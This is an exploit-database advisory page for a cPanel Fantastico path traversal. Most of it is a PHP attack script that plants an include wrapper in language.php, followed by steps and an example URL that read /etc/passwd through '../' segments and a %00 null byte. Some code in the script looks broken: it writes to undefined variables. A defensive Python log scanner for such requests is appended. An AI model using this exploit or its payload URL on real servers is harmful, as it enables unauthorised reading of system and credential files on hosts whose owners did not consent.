Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

2009-07-03 / 2009-07-04
Credit: Super-Crystal
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Script : Cpanel 11.x
bug : language.php [edit file]
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"
safemode off , mod_security off
Disable functions : All NONE ,access root folder

<?php
/*
########################################
# Deadly Script by Super-Crystal
# bypass Cpanel fantastico
# www.arab4services.net
# ##e-mail : l1un (at) hotmail (dot) com [email concealed] , i-1 (at) hotmail (dot) com [email concealed]##
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r']))
{
    if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux"))
    {
        $phpwrapper = '<?php include_once("./language/".$_GET[sup3r].".php"); ?> ';
        fwrite($h,$prctl);
        fclose($h);
        $handle = fopen($_POST['php'], "w");
        fwrite($handle, $phpwrapper);
        fclose($handle);
        echo "Building exploit...<br />";
        echo "coding by Super-Crystal <br />";
        echo "Cleaning up<br />";
        echo "Done!<br /> </pre>";
    }
    else
    {
        echo "error : ".php_uname();
    }
}
else
{
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php <br />
2- click on the submit <br />
3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../.. /../../../etc/passwd%00 . <br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net </a></center>
</div>
</form>
<?php } ?>

arab4services.net
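
For defenders, the request shape in step 3 (a ".." path segment and a %00 terminator in a query parameter of the Fantastico front end) can be searched for in web access logs. The Python below is an added example, not part of the original advisory and not cPanel code; the common-log-format layout, the constructed sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # a ".." path segment

# Constructed sample lines (common log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Jul/2009:10:00:01 +0000] "GET /frontend/x3/fantastico/index.php?lang=en HTTP/1.1" 200 5120
198.51.100.7 - - [04/Jul/2009:10:00:09 +0000] "GET /frontend/x3/fantastico/index.php?sup3r=../../../etc/passwd%00 HTTP/1.1" 200 1873
203.0.113.5 - - [04/Jul/2009:10:01:12 +0000] "GET /frontend/x3/fantastico/index.php?x=%252e%252e%252fconfig HTTP/1.1" 200 412
203.0.113.9 - - [04/Jul/2009:10:02:30 +0000] "GET /frontend/x3/index.html?file=../notes HTTP/1.1" 200 900
"""

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return findings for the query-string values of one request target."""
    findings = set()
    for pair in target.partition("?")[2].split("&"):
        value = fully_decode(pair.partition("=")[2])
        if "\x00" in value:
            findings.add("null-byte")
        if TRAVERSAL.search(value):
            findings.add("traversal")
    return findings

def scan(log_text, path_marker="/fantastico/"):
    """List (line number, findings) for flagged requests under path_marker."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m or path_marker not in m.group(1).partition("?")[0]:
            continue  # not a request line, or outside the watched path
        findings = classify(m.group(1))
        if findings:
            hits.append((lineno, sorted(findings)))
    return hits

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

The parameter name is chosen by whoever wrote the wrapper, so the check inspects every query value rather than matching on `sup3r`.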

References:

http://xforce.iss.net/xforce/xfdb/46991
http://www.securityfocus.com/bid/32578
http://www.securityfocus.com/archive/1/archive/1/498814/100/0/threaded



Copyright 2024, cxsecurity.com

 
